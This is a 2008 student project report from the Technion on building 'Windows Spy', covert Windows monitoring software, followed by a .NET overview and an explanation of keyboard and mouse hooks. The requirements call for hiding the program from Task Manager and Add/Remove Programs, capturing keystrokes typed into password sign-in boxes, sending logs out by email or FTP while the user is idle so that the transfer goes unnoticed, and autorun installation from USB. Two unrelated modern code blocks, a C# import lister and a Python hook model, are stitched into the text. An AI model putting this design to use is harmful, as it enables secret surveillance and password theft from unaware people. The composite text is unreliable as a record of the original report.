Windows Spy Project


2 Nov 2013 (3 years and 9 months ago)


Windows Spy Project

Department of Electrical Engineering, Technion

2008

Windows Spy Project

Maksim Kogan  skoganm@t2.technion.ac.il

Roey Ben Haim  sroeybh@t2.technion.ac.il

Supervisor: Assaf Solomovitch  assaf.sela@gmail.com

Lab Chief Eng.: Ilana David

Software Systems Lab, Department of Electrical Engineering, Technion - Israel Institute of Technology

Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


2

Table of Contents

Introduction
    Windows Spy project ........ 5
    Project goal ........ 6

Technology overview ........ 7
    The .NET Platform ........ 8
    .NET Framework ........ 8
    Compilation and the MSIL ........ 10
    The C# Language ........ 10

Requirements Document ........ 12

Windows Hooks ........ 17
    Windows Messages ........ 17
    Windows Hooks ........ 17
    How to set a windows hook ........ 18
    Hooks in .Net, the win32API class, and how we used it ........ 20
    Example of setting a hook in C# ........ 21

Project overview - running modes and general software options
    Client Application running Mode ........ 23
        Settings ........ 23
        Stealth Mode ........ 23
        Starting and Stopping Time ........ 24
        Key Logger ........ 25
            Options ........ 25
            Log File ........ 25
        Mouse Logger ........ 27
            Options ........ 27
            Log File ........ 28
        URL Logger ........ 29
            Options ........ 29
            Log File ........ 30
        Image Recorder ........ 30
            Options ........ 31
            Screenshots ........ 31
        Remoting ........ 31
            Options ........ 32
    Client & Server Application running Mode ........ 33
        Client ........ 33
        Server ........ 34
            Enable and Disable ........ 34
            Sending the Files ........ 34
            Ending the Monitoring ........ 35
            Sending Email ........ 35
            Status ........ 35
    USB Spying Mode ........ 63
        Autorun.inf ........ 36
        Appinstall.exe ........ 37
        Init.txt ........ 38

Code snippets and implementation of the software
    Client Implementation techniques & Code ........ 39
        Key Logger ........ 39
            Initializing Keyboard Hook ........ 39
            The Key Logger ........ 41
            Disabling the Key Logger ........ 42
        Mouse Logger ........ 43
            Initializing Mouse Hook ........ 43
            The Mouse Logger ........ 43
            Disabling the Mouse Logger ........ 44
        URL Hook ........ 45
        Image Recorder ........ 48
            Create a Screenshot ........ 48
            Time Intervals ........ 48
            Dangerous Keystrokes ........ 49
            Timer ........ 50
        Email ........ 52
        Stealth Mode & password ........ 53
    Server Communication implementation ........ 55
        The Client Side ........ 55
        The Server Side ........ 56
        File transferring ........ 57
        Picture transferring ........ 62
        Get Status ........ 65
        Enable/disable ........ 67

Design ........ 69
    Client Class Diagram ........ 69
    Client Class Diagram Overview ........ 70
    Server Class Diagram ........ 71
    Server Class Diagram Overview ........ 71
    File Transfer Sequence Diagram ........ 72
    File Transfer Sequence Diagram Overview ........ 73
    Image Transfer Sequence Diagram ........ 74
    Image Transfer Sequence Diagram Overview ........ 75
    Single Command Sequence Diagram ........ 75
    Single Command Sequence Diagram Overview ........ 75

Introduction


Windows Spy project

Spy Software (also called “Computer Monitoring Software”) is undetectable software that runs on a computer and secretly records a computer user by capturing all keystrokes, websites visited, documents read, chat conversations, etc.

Some of the more popular real-life uses of such applications are child Internet-monitoring and employee monitoring, or simply making sure no one uses your computer improperly when you're gone.

The internet is full of ads for different types of tracking software to download for monitoring your family, friends, anyone who uses your computer after you're gone, etc.

With the Internet exposing surfers to any type of information, including material inappropriate to minors or even illegal and abusive to all, the need for such programs increases, and they become must-have software for any household today.

The level of monitoring done can vary from just logging all the keystrokes of the user, to taking screenshots of the computer's desktop when predefined words are typed.

Spying software can also take the form of a web-based service. In this type of spying service, the owner is not required to physically access the monitored computer to view the recordings. Everything is saved and maintained on a web server.

Our project consists of building fully usable spying software with all common features (and more) included, such as: recording keystrokes, mouse movements and clicks, websites visited, programs used and files changed and viewed, dates and times of different actions, and taking snapshots of the computer screen at pre-defined events. Any combination of the above can be defined for a specific software run.

Furthermore, we implemented a web server which can completely control the application that runs on a remote computer. We have such options as enabling or disabling our running application or closing it completely; we can check whether the user is currently working on the machine, send the log files created to our email, or even instantly send the logs we choose to our computer.

Furthermore, a technique for fast installation of the software on any computer, also making it load on start-up, was developed. In this scenario, you can install the application with a single click, making sure it starts running even after the computer reboots.

Another important feature of spying that was implemented in our application is the hidden and undetected running mode of the software. We took special care to enable a stealth running mode, disguise the process itself, and make sure that file transfers to the server and the creation of the log files do not interfere with, or get noticed by, the user working on the computer.

All of the project components described above create complete, real-life usable spying software that can be used on any Windows version with the .NET Framework installed, to create a complete picture of the activities done on any PC.

Project goal


This is first and foremost an academic project, intended to introduce us, the students, to the .NET Framework as a whole, while also exposing us to the C# programming language.

Why Spying Software?

This type of software includes many interesting as well as complex aspects of programming. Because the spying involves many different types of information to be recorded, almost each type presented us with a new challenge and a new technique to solve it. For example, we had to use thread programming involving locks for the URL Logger and the client/server listening functions, as well as socket programming to implement their communication.

We had to learn quite a few new technologies and subjects, which are all incorporated in this work in some way or other.

Among the things we have learnt:

- .NET platform and C#
- Windows Forms and controls
- Low-level Win32 API programming
- Windows messages
- Windows hooks technology
- Event-driven programming
- Socket programming
- Thread programming

Technology overview

Every 10 years or so, a new approach to programming hits like a tsunami. In the early 1980s, the new technologies were Unix, which could be run on a desktop, and a powerful new language called C, developed by AT&T. The early 90s brought Windows and C++. Each of these developments represented a sea change in the way we approached programming. Now, .NET and C# are the next wave.

Microsoft has "bet the company" on .NET. When a company of their size and influence spends billions of dollars and reorganizes its entire corporate structure to support a new platform, programmers take notice. It turns out that .NET represents a major change in the way you'll think about programming. It is, in short, a new development platform designed to facilitate object-oriented Internet development. The programming language of choice for this platform is C#, which builds on the lessons learned from C (high performance), C++ (object-oriented structure), Java (garbage collection, high security), and Visual Basic (rapid development) to create a new language ideally suited for developing component-based, n-tier distributed web applications.

The goal of C# is to provide a simple, safe, modern, object-oriented, Internet-centric, high-performance language for .NET development. C# is a new language, but it draws on the lessons learned over the past three decades. In much the way that you can see in young children the features and personalities of their parents and grandparents, you can easily see in C# the influence of Java, C++, Visual Basic (VB), and other languages.

The .NET Platform

When Microsoft announced C# in July 2000, its unveiling was part of a much larger event: the announcement of the .NET platform. The .NET platform is, in essence, a new development framework that provides a fresh application programming interface (API) to the services and APIs of classic Windows operating systems (especially the Windows 2000 family), while bringing together a number of disparate technologies that emerged from Microsoft during the late 1990s. This includes COM+ component services, the ASP web development framework, a commitment to XML and object-oriented design, support for new web services protocols such as SOAP, WSDL, and UDDI, and a focus on the Internet, all integrated within the DNA architecture.

Microsoft says it is devoting 80% of its research and development budget to .NET and its associated technologies. The results of this commitment to date are impressive. For one thing, the scope of .NET is huge. The platform consists of four separate product groups:

- A set of languages, including C# and Visual Basic .NET, a set of development tools including Visual Studio .NET, a comprehensive class library for building web services and web and Windows applications, as well as the Common Language Runtime (CLR) to execute objects built within this framework.
- A set of .NET Enterprise Servers, formerly known as SQL Server 2000, Exchange 2000, BizTalk 2000, and so on, that provide specialized functionality for relational data storage, email, B2B commerce, etc.
- An offering of commercial web services, called .NET My Services. For a fee, developers can use these services in building applications that require knowledge of user identity, etc.
- New .NET-enabled non-PC devices, from cell phones to game boxes.

.NET Framework

Microsoft .NET supports not only language independence, but also language integration. This means that you can inherit from classes, catch exceptions, and take advantage of polymorphism across different languages. The .NET Framework makes this possible with a specification called the Common Type System (CTS) that all .NET components must obey. For example, everything in .NET is an object of a specific class that derives from the root class called System.Object. The CTS supports the general concept of classes, interfaces, delegates (which support callbacks), reference types, and value types.

Additionally, .NET includes a Common Language Specification (CLS), which provides a series of basic rules that are required for language integration. The CLS determines the minimum requirements for being a .NET language. Compilers that conform to the CLS create objects that can interoperate with one another. The entire Framework Class Library (FCL) can be used by any language that conforms to the CLS.

The .NET Framework sits on top of the operating system, which can be any flavor of Windows, and consists of a number of components, currently including:

- Four official languages: C#, VB.NET, Managed C++, and JScript.NET
- The CLR, an object-oriented platform for Windows and web development that all these languages share
- A number of related class libraries, collectively known as the FCL

The most important component of the .NET Framework is the CLR, which provides the environment in which programs are executed. The CLR includes a virtual machine, analogous in many ways to the Java virtual machine. At a high level, the CLR activates objects, performs security checks on them, lays them out in memory, executes them, and garbage-collects them. (The Common Type System is also part of the CLR.)

The layer on top of the CLR is a set of framework base classes, followed by an additional layer of data and XML classes, plus another layer of classes intended for web services, Web Forms, and Windows Forms. Collectively, these classes make up the FCL, one of the largest class libraries in history and one that provides an object-oriented API for all the functionality that the .NET platform encapsulates. With more than 4,000 classes, the FCL facilitates rapid development of desktop, client/server, and other web services and applications.

The set of Framework base classes, the lowest level of the FCL, is similar to the set of classes in Java. These classes support rudimentary input and output, string manipulation, security management, network communication, thread management, text manipulation, reflection and collections functionality, etc.

Above this level is a tier of classes that extend the base classes to support data management and XML manipulation. The data classes support persistent management of data that is maintained on backend databases. These classes include the Structured Query Language (SQL) classes to let you manipulate persistent data stores through a standard SQL interface. Additionally, a set of classes called ADO.NET allows you to manipulate persistent data. The .NET Framework also supports a number of classes to let you manipulate XML data and perform XML searching and translations.

Extending the Framework base classes and the data and XML classes is a tier of classes geared toward building applications using three different technologies: Web Services, Web Forms, and Windows Forms. Web services include a number of classes that support the development of lightweight distributed components, which will work even in the face of firewalls and NAT software. Because web services employ standard HTTP and SOAP as underlying communications protocols, these components support Plug and Play across cyberspace.

Web Forms and Windows Forms allow you to apply Rapid Application Development techniques to building web and Windows applications. Simply drag and drop controls onto your form, double-click a control, and write the code to respond to the associated event.


Compilation and the MSIL

In .NET, programs are not compiled into executable files; they are compiled into Microsoft Intermediate Language (MSIL) files, which the CLR then executes. The MSIL (often shortened to IL) files C# produces are identical to the IL files that other .NET languages produce; the platform is language-agnostic. A key fact about the CLR is that it is common: the same runtime supports development in C# as well as in VB.NET.

C# code is compiled into IL when you build your project. The IL is saved in a file on disk. When you run your program, the IL is compiled again, using the Just In Time (JIT) compiler (a process often called JITing). The result is machine code, executed by the machine's processor.

The standard JIT compiler runs on demand. When a method is called, the JIT compiler analyzes the IL and produces highly efficient machine code, which runs very fast. The JIT compiler is smart enough to recognize when the code has already been compiled, so as the application runs, compilation happens only as needed. As .NET applications run, they tend to become faster and faster, as the already compiled code is reused.

The CLS means that all .NET languages produce very similar IL code. As a result, objects created in one language can be accessed and derived from another. Thus it is possible to create a base class in VB.NET and derive from it in C#.

The C# Language

The C# language is disarmingly simple, with only about 80 keywords and a dozen built-in datatypes, but C# is highly expressive when it comes to implementing modern programming concepts. C# includes all the support for structured, component-based, object-oriented programming that one expects of a modern language built on the shoulders of C++ and Java.

The C# language was developed by a small team led by two distinguished Microsoft engineers, Anders Hejlsberg and Scott Wiltamuth. Hejlsberg is also known for creating Turbo Pascal, a popular language for PC programming, and for leading the team that designed Borland Delphi, one of the first successful integrated development environments for client/server programming.

At the heart of any object-oriented language is its support for defining and working with classes. Classes define new types, allowing you to extend the language to better model the problem you are trying to solve. C# contains keywords for declaring new classes and their methods and properties, and for implementing encapsulation, inheritance, and polymorphism, the three pillars of object-oriented programming.

In C#, everything pertaining to a class declaration is found in the declaration itself. C# class definitions do not require separate header files or Interface Definition Language (IDL) files. Moreover, C# supports a new XML style of inline documentation that simplifies the creation of online and print reference documentation for an application.


C# also supports interfaces, a means of making a contract with a class for services that the interface stipulates. In C#, a class can inherit from only a single parent, but a class can implement multiple interfaces. When it implements an interface, a C# class in effect promises to provide the functionality the interface specifies.

C# also provides support for structs, a concept whose meaning has changed significantly from C++. In C#, a struct is a restricted, lightweight type that, when instantiated, makes fewer demands on the operating system and on memory than a conventional class does. A struct can't inherit from a class or be inherited from, but a struct can implement an interface.

C# provides component-oriented features, such as properties, events, and declarative constructs (called attributes). Component-oriented programming is supported by the CLR's support for storing metadata with the code for the class. The metadata describes the class, including its methods and properties, as well as its security needs and other attributes, such as whether it can be serialized; the code contains the logic necessary to carry out its functions. A compiled class is thus a self-contained unit. Therefore, a hosting environment that knows how to read a class' metadata and code needs no other information to make use of it. Using C# and the CLR, it is possible to add custom metadata to a class by creating custom attributes. Likewise, it is possible to read class metadata using CLR types that support reflection.

An assembly is a collection of files that appear to the programmer to be a single dynamic link library (DLL) or executable (EXE). In .NET, an assembly is the basic unit of reuse, versioning, security, and deployment. The CLR provides a number of classes for manipulating assemblies.

A final note about C# is that it also provides support for directly accessing memory using C++ style pointers and keywords for bracketing such operations as unsafe, and for warning the CLR garbage collector not to collect objects referenced by pointers until they are released.
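The attribute, reflection and assembly mechanics described above, shown in a small C# program added here as an example; it is not code from the report or from the Windows Spy project. It defines a custom attribute and reads it back, uses a struct that implements an interface, and walks an assembly's metadata to list every P/Invoke declaration, that is, the Win32 functions a managed binary imports through DllImport. For a defender, that import list is a quick triage check on a managed binary: a program built on the Win32 hooking techniques this report uses has to declare those imports, and they are recoverable from the metadata without running it. The names ReviewedAttribute, NativeImport, ImportLister and ListImports, the placeholder reviewer string, and the harmless kernel32 GetTickCount import used as the sample are all assumptions of this example.

```csharp
// Added example (not from the report): read .NET metadata through reflection to
// list the P/Invoke (DllImport) declarations of an assembly.
using System;
using System.Collections.Generic;
using System.Reflection;
using System.Runtime.InteropServices;

// A custom attribute: the CLR stores it as metadata alongside the class it marks.
[AttributeUsage(AttributeTargets.Class)]
sealed class ReviewedAttribute : Attribute
{
    public string Reviewer { get; private set; }
    public ReviewedAttribute(string reviewer) { Reviewer = reviewer; }
}

// A struct cannot inherit from a class, but it may implement an interface.
interface IDescribable { string Describe(); }

struct NativeImport : IDescribable
{
    public string Dll;
    public string EntryPoint;
    public string Describe() { return Dll + "!" + EntryPoint; }
}

[Reviewed("reviewer-placeholder")]   // placeholder value, assumed for the example
static class ImportLister
{
    // One P/Invoke declaration so the program has something to find in itself.
    // GetTickCount is a harmless kernel32 function chosen only as a demonstration.
    [DllImport("kernel32.dll")]
    static extern uint GetTickCount();

    // Returns every P/Invoke declaration in the assembly. The compiler records each
    // 'extern' import as ImplMap metadata, which reflection exposes as the
    // PinvokeImpl method flag plus a synthesized DllImportAttribute.
    public static NativeImport[] ListImports(Assembly asm)
    {
        var found = new List<NativeImport>();
        Type[] types;
        try { types = asm.GetTypes(); }
        catch (ReflectionTypeLoadException e) { types = e.Types; } // keep the types that did load

        const BindingFlags all = BindingFlags.Static | BindingFlags.Instance |
                                 BindingFlags.Public | BindingFlags.NonPublic |
                                 BindingFlags.DeclaredOnly;
        foreach (Type t in types)
        {
            if (t == null) continue;
            foreach (MethodInfo m in t.GetMethods(all))
            {
                if ((m.Attributes & MethodAttributes.PinvokeImpl) == 0) continue;
                var imp = m.GetCustomAttribute<DllImportAttribute>();
                found.Add(new NativeImport
                {
                    Dll = imp != null ? imp.Value : "?",
                    // EntryPoint is null when the import uses the method's own name.
                    EntryPoint = (imp != null && imp.EntryPoint != null) ? imp.EntryPoint : m.Name
                });
            }
        }
        return found.ToArray();
    }

    static void Main(string[] args)
    {
        // Inspect the assembly named on the command line, or this program itself.
        Assembly asm = args.Length > 0 ? Assembly.LoadFrom(args[0])
                                       : Assembly.GetExecutingAssembly();

        // Read our own custom attribute back through the same reflection API.
        var reviewed = typeof(ImportLister).GetCustomAttribute<ReviewedAttribute>();
        Console.WriteLine("ImportLister reviewed by: " +
                          (reviewed != null ? reviewed.Reviewer : "(none)"));

        foreach (NativeImport imp in ListImports(asm))
            Console.WriteLine(imp.Describe());
    }
}
```

Run without arguments and it reports its own single kernel32 import; pass a file path to inspect another managed binary. Two caveats: GetCustomAttribute<T> is the .NET 4.5 extension method, so the 2008-era toolchain the report targets would need the older Attribute.GetCustomAttribute overloads instead; and Assembly.LoadFrom makes the file loadable for execution in the current process, so inspect an untrusted binary this way only inside an isolated analysis VM, or use a metadata-only reader such as System.Reflection.Metadata.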

Requirements Document

Abstract


Spy Software (also called “Computer Monitoring Software”) is a piece of undetectable software that runs on a computer, and secretly records computer usage by capturing all I/O activity, including keystrokes, websites visited, documents read, chat conversations, etc.

Common use of such applications includes child Internet-monitoring and employee monitoring.

The level of monitoring done can vary from just logging all the keystrokes of the user, to getting screenshots of the computer's desktop, and all the way to making a full video recording of the user's actions.

It creates detailed reports for the software installer, which are hidden from the person being monitored.

Spy software can also be in the form of a web-based service. In this type of service, the owner is not required to physically access the monitored computer to view the recordings. Everything is logged on a remote server.

Our application intends to implement the principles above, allowing the owner to configure and choose the monitoring options available for tracking usage on the computer.


1. System objectives

1.1. Windows-Spy (henceforth called the system) is a “hidden” (the user is unaware of its existence) software application that tracks different types of information (according to the owner's request) and saves it at a predefined location, known only to the owner.

1.2. The install and activate actions are made by the owner on the computer itself, but the information recorded is sent to a remote server (in addition to being saved on the monitored computer). The owner may now view the information by downloading it from the server (as well as from the monitored computer itself as described in 1.1).

1.2.1. The activation may also be adjusted to be done remotely.

1.2.2. Auto-install from the web will be possible.


2. System Context

Upon installation and launch, the system will provide a GUI for the owner and ask them to choose the options for the current monitoring session:

2.1. Stealth mode or visible mode of work (from the user's side).

2.1.1. While in stealth mode, the system is completely hidden (no start menu, no taskbar icon, and if possible not even in the Add/Remove Programs menu and the task manager). When it's time to change settings or turn off, the owner should open the hidden interface by pressing a secret key combination (that he set beforehand), which will bring up a password box; after typing the password, he will be able to make changes.

2.1.2. While in visible mode, a tray icon will appear, but the system is still password protected (though no secret combination is required).


2.2. Types of monitoring

2.2.1. Keystroke Monitoring

2.2.1.1. Key Logger - Track all keystrokes pressed (regardless of which window they were pressed in).

2.2.1.2. Log all keystrokes made in an internet browser along with the URL.

2.2.1.3. Log all keystrokes and which processes they were pressed in. This includes the application name (e.g. “Notepad”, “Microsoft Word”, “Microsoft internet explorer”) and the box in the application (if there is such) itself, e.g. “Microsoft explorer - Sign in”; here the keystrokes were in the “Sign in” box (password) in the explorer application.

If the application is a browser, the URL will be logged as well.

If the application is an editor of some sort, the file name that was edited will be logged.

2.2.1.3.1. Choose the applications for monitoring keystrokes. The owner will be able to choose from a list of applications which applications to monitor keystrokes in (2.2.1.3 is the option “all applications”).

2.2.2. Site monitoring: Record all website URLs that were accessed.

2.2.3. Documents Opened - Record documents and files accessed (such as Microsoft Office documents, pictures, etc).

2.2.4. Record which processes ran.

2.2.5. Screen snapshots taken automatically at regular intervals.

2.2.5.1. Saving only screenshots of a web browser (with the URL) will be an option.

2.2.5.2. Optional: configure making screen shots only when certain words are typed (for example: if the word “facebook” is typed, the boss of the employee would like some shots of the screen as a suspicion that the employee is surfing the facebook site during work).

2.2.6. Video recording of the desktop (screen-capture using an open source software).

2.2.7. Real-Time remote monitoring.


2.3. Define where the log files will be placed

2.3.1. Predefined (default) folder.

2.3.2. Define a customized folder.

2.3.3. Delivery via FTP to a remote server / Log delivery via email.

In case of selecting one of these options, the logs delivery is done only when the computer is not in use (a pre-defined amount of time has passed without any mouse/keyboard use, indicating the user left the computer). This will be a good time to use the internet service for sending the files, this way not loading the network and slowing possible user activity (making the process un-noticed for the user).

2.4. Time scheduling - The spy program can be configured to start and stop recording at the times specified by the owner.

2.4.1. Start time may be immediate and finish time is when the computer is “not in use” (as explained in 2.3.3), and begin again when usage is renewed, and so on.

2.5. The system will provide usage statistics (date, time, etc) within all tracking options (which time each web page was visited, etc...).

2.6. A single instance application - If the owner starts a second copy of Windows-Spy, the first copy is brought to the foreground instead of starting a second copy.

2.7. On top application - when the system is launched (with the secret combination explained later) it appears in front of other applications on the screen.



3. Functional Requirements

Upon launch of the application, we get the settings interface window.

The settings interface appears only in the following scenarios:

- After launching the application.

- When running in stealth mode, and the secret key combination is pressed, after which the correct password is entered. If the user accidentally presses this combination he’ll get stuck with the password window (in front) until he closes it (or the password is entered).

- When running in visible mode and the system’s tray icon is selected.

The settings interface includes the following boxes:

- Password setup (Type/confirm password fields).

- Hot keys setup.

- Choose the mode to run in - Stealth/Visible mode.

- Choose the kind of monitoring type wanted (according to the different types mentioned in the system context section). If screenshot monitoring is selected, the owner will need to specify the frequency of the snapshots taken in any case. (If the option of making a screen shot only when special words are typed is chosen, the owner will have the ability to write the “alert” words he wants.)

- Clear current log files. The action (pressing the button) deletes all log files that are currently saved in the hidden logs folder.

- Description of the log files (size and type of log file). Alongside the settings options, current log file statistics will be shown, in the same window.

- Set monitoring schedule (work non-stop from time of activation, or a specific start and finish time can be given).

- For Remote Monitoring - Description of the monitoring computer (email or IP address for a remote server) for the log files to be sent to. In these options, the owner will specify how frequently he wants the monitored data to be sent to him (note: the data will be saved in the hidden folder on the computer as well).

The system shall provide defaults for all missing elements needed for the current monitoring action (the default monitoring type, default password, default snapshot frequency); these parameters will already be defaulted, so the owner could run the application by just pressing “start”.

After the owner finishes configuring the settings, pressing “Start” will begin the monitoring in the specified mode.

Stopping the application

There are 2 scenarios in which the application stops:

- If in stealth mode, the program stops monitoring as soon as the owner enters the correct password combination (that appears after typing the secret key combination). If in visible mode, selecting the tray icon and the “stop” button stops the application. As mentioned earlier, in both cases the settings window appears on screen (and on top).

- If Windows restarts or shuts down, in the next start-up the application is disabled.

Accessing the log-files

The folder of the log files will be saved on disk and will be hidden from the computer user (password protected/invisible…). Furthermore, access to the folder during system activity (monitoring in progress) will be forbidden (not to cause a conflict with the system). After the monitoring stops, access is available (via direct access or the “clear-logs” button in the interface). The log statistics will be updated the next time the interface window re-appears (i.e. erasing some logs won’t change the “statistics” window mentioned).

- Only one logs-folder will be on the computer at any time (so that if we start a new session, the option of defining a new logs folder (2.3) will ask for deleting the old one if there is such).


4. Non-Functional Requirements

Maintenance: the folder holding the log files should be rather small (the owner should maintain it) so that it won't over-size the disk/partition substantially.

Portability: any Windows SP2 OS or newer.

Performance: The system activity will not degrade performance of the applications running on the machine.

5. Environment Requirements

The requirements needed to run the application are:

5.1. All Windows XP SP2 versions and newer (the only demand is that the Win API functions we use will be available in the specific Windows version that the software is installed on).

5.2. .NET framework version 1.0 or better.

6. Future Requirements

In the future, the monitoring will be processed in a remote computer which will get all the information stated. Moreover, we would like to save snapshots of the screen and perhaps a file providing a short monitoring movie.

* These are more advanced features, hence put in the “future requirements” (although specified in the document above).

Also, if the remote log viewing will be implemented, further requirements will be added, regarding what happens if the mail address is incorrect, or the system is unable to connect to the internet or the remote server, etc…

Windows Hooks

The Windows Hooks mechanism is a crucial subject in our application and was a starting point for the 3 main loggers of the application (Keys, Mouse, URL). In this chapter we will see what Windows hooks are, why they are so important, how they work, and how to use them. First we’ll explain about Windows messages:

Windows Messages

Unlike MS-DOS-based applications, Windows-based applications are event-driven. They do not make explicit function calls (such as C run-time library calls) to obtain input. Instead, they wait for the system to pass input to them. The system passes all input for an application to the various windows in the application. Each window has a function, called a window procedure, that the system calls whenever it has input for the window. The window procedure processes the input and returns control to the system.

The system passes input to a window procedure in the form of messages. Messages are generated by both the system and applications. The system generates a message at each input event. For example, when an application is hidden by another window and then brought to the front, Windows sends that application a WM_PAINT message. The WM_PAINT message instructs the application to redraw its main window. Likewise, Windows sends the application a WM_MOUSEMOVE message every time the mouse moves over the application.

An application can generate messages to direct its own windows to perform tasks or to communicate with windows in other applications.

The system sends a message to a window procedure with a set of four parameters: a window handle, a message identifier, and two values called message parameters. The window handle identifies the window for which the message is intended. The system uses it to determine which window procedure should receive the message.

To manage all of these messages, Windows maintains message queues. A message queue is a FIFO (first in, first out) list of messages. Messages are placed in the queue and processed in the order they were received. Windows will process the messages in the queue when it has time. Windows maintains a global system message queue and separate message queues for each GUI thread.

Windows Hooks

A hook is a point in the system message-handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process certain types of messages before they reach the target window procedure.

Windows hooks can be considered one of the most powerful features of Windows. With them, you can trap events that will occur, either in your own process or in other processes. By "hooking", you tell Windows about a function (filter function, also called hook procedure) that will be called every time an event you're interested in occurs.

The system supports many different types of hooks; each type provides access to a different aspect of its message-handling mechanism. For example, an application can use the WH_MOUSE hook to monitor the message traffic for mouse messages.

The system maintains a separate hook chain for each type of hook. A hook chain is a list of pointers to special, application-defined callback functions called hook procedures. When a message occurs that is associated with a particular type of hook, the system passes the message to each hook procedure referenced in the hook chain, one after the other.

A fundamental aspect of hooks is their scope. Normally, hooks may have either system or thread scope. A few, however, can only have system scope. When a hook works at the thread level, it can only trap events generated within that thread. For example, a keyboard hook gets invoked only for the keystrokes directed to the thread's input queue. Similarly, a system-wide mouse hook gets called whenever the user moves the mouse, regardless of the particular thread that handles the event. A system-scoped hook is called to handle the event for all the currently running threads.

How to set a Windows hook

The SetWindowsHookEx function installs an application-defined hook procedure into a hook chain. You would install a hook procedure to monitor the system for certain types of events. These events are associated either with a specific thread or with all threads in the same desktop as the calling thread.

    HHOOK SetWindowsHookEx(
        int idHook,
        HOOKPROC lpfn,
        HINSTANCE hMod,
        DWORD dwThreadId
    );

idHook
    Specifies the type of hook procedure to be installed. For example, WH_KEYBOARD_LL installs a hook procedure that monitors low-level keyboard input events.

lpfn
    Pointer to the hook procedure.

hMod
    Handle to the hook installed.

dwThreadId
    Specifies the identifier of the thread with which the hook procedure is to be associated. If this parameter is zero, the hook procedure is associated with all existing threads running in the same desktop as the calling thread.

The UnhookWindowsHookEx function removes a hook procedure installed in a hook chain by the SetWindowsHookEx function.

    BOOL UnhookWindowsHookEx(
        HHOOK hhk
    );


hhk
    The handle to the hook to be removed. This parameter is a hook handle that is returned by the call to SetWindowsHookEx that installed the hook.

At the end of the handle function of the hook, you must call the CallNextHookEx function.

The CallNextHookEx function passes the hook information to the next hook procedure in the current hook chain (if there is none, then the message returns to the system handling). A hook procedure can call this function either before or after processing the hook information.

If you don’t call this function, you block the message from going on to the system! (For example, this way you can prevent keystrokes from having any effect.)

    LRESULT CallNextHookEx(
        HHOOK hhk,
        int nCode,
        WPARAM wParam,
        LPARAM lParam
    );

hhk
    Handle to the current hook.

nCode
    Specifies the hook code passed to the current hook procedure. The next hook procedure uses this code to determine how to process the hook information.

wParam
    Specifies the wParam value passed to the current hook procedure. The meaning of this parameter depends on the type of hook associated with the current hook chain.

lParam
    Specifies the lParam value passed to the current hook procedure. The meaning of this parameter depends on the type of hook associated with the current hook chain.
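To make the chain semantics just described concrete (the newest hook runs first, dwThreadId selects thread or system scope, and a hook procedure that skips CallNextHookEx swallows the message so it never reaches the window), here is an added Python model. It is not part of the project and does not touch the real Win32 API: the three functions are mirrored as set_windows_hook_ex, unhook_windows_hook_ex and the chain walk that CallNextHookEx performs, messages are constructed tuples of (thread id, message name, wParam), and the thread ids 7 and 9 are invented for the demo.

```python
"""Model of a Windows hook chain and the CallNextHookEx contract (added example, not project code)."""
from collections import deque
from typing import Callable, Deque, Dict, List, Tuple

# A message as it sits in a thread's queue: (target thread id, message name, wParam).
# The thread ids and payloads used in demo() are constructed for this example.
Message = Tuple[int, str, int]
# A hook procedure receives (nCode, wParam, lParam, call_next); call_next() plays the
# role of CallNextHookEx(hhk, nCode, wParam, lParam) for the remainder of the chain.
HookProc = Callable[[int, int, Message, Callable[[], int]], int]

SYSTEM_SCOPE = 0  # dwThreadId == 0: the hook applies to every thread on the desktop


class HookChain:
    """One chain per hook type. As in Windows, the most recently installed hook runs first."""

    def __init__(self) -> None:
        self._hooks: List[Tuple[int, HookProc, int]] = []  # (handle, proc, thread id)
        self._next_handle = 1
        self.delivered: List[Message] = []  # messages that reached a window procedure

    def set_windows_hook_ex(self, proc: HookProc, thread_id: int) -> int:
        """Install proc at the head of the chain and return its HHOOK-like handle."""
        handle = self._next_handle
        self._next_handle += 1
        self._hooks.insert(0, (handle, proc, thread_id))
        return handle

    def unhook_windows_hook_ex(self, handle: int) -> bool:
        """Remove the hook with that handle; False if there is no such hook."""
        before = len(self._hooks)
        self._hooks = [h for h in self._hooks if h[0] != handle]
        return len(self._hooks) != before

    def dispatch(self, msg: Message) -> int:
        """Walk the chain for one message. Only hooks whose scope covers the target
        thread are called, and the message reaches the window procedure only if
        every hook procedure on the way calls next."""
        target_thread = msg[0]
        in_scope = [h for h in self._hooks if h[2] in (SYSTEM_SCOPE, target_thread)]
        reached_window = False

        def call_from(index: int) -> int:
            nonlocal reached_window
            if index >= len(in_scope):
                reached_window = True  # end of chain: the system delivers the message
                return 0
            _, proc, _ = in_scope[index]
            return proc(0, msg[2], msg, lambda: call_from(index + 1))

        result = call_from(0)
        if reached_window:
            self.delivered.append(msg)
        return result


def run_queue(chain: HookChain, queue: Deque[Message]) -> List[Message]:
    """Drain a FIFO message queue through the chain; return what the windows received."""
    while queue:
        chain.dispatch(queue.popleft())
    return chain.delivered


def demo() -> Dict[str, object]:
    """A system-wide hook that forwards, then a thread-scoped hook that does not."""
    seen: List[str] = []

    def monitor(ncode: int, wparam: int, lparam: Message, call_next: Callable[[], int]) -> int:
        seen.append(lparam[1])
        return call_next()  # forwards, so input still arrives at the window

    def blocker(ncode: int, wparam: int, lparam: Message, call_next: Callable[[], int]) -> int:
        return 1  # never calls next: the message is swallowed and the user sees lost input

    chain = HookChain()
    h_monitor = chain.set_windows_hook_ex(monitor, SYSTEM_SCOPE)
    first = list(run_queue(chain, deque([(7, "WM_KEYDOWN", 65), (9, "WM_MOUSEMOVE", 0)])))

    h_blocker = chain.set_windows_hook_ex(blocker, 7)  # thread scope: thread 7 only
    chain.delivered.clear()
    second = list(run_queue(chain, deque([(7, "WM_KEYDOWN", 66), (9, "WM_KEYDOWN", 67)])))

    unhooked = [chain.unhook_windows_hook_ex(h_blocker), chain.unhook_windows_hook_ex(h_monitor)]
    return {"seen": seen, "first": first, "second": second, "unhooked": unhooked}


if __name__ == "__main__":
    print(demo())
```

In the second round the thread-7 keystroke is consumed by the blocking hook before the system-wide monitor ever sees it, while the thread-9 keystroke bypasses the thread-scoped hook entirely. This is also why a hook that is left installed after its owner exits is a stability problem and why unhooking before exit, as the page does, matters.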



These 3 functions are the main functions for setting a hook from your application. An example of how it is done in C#, as well as an example of the handle function and how exactly to use these 3 functions, can be seen next.







Hooks in .NET, the Win32API class, and how we used it

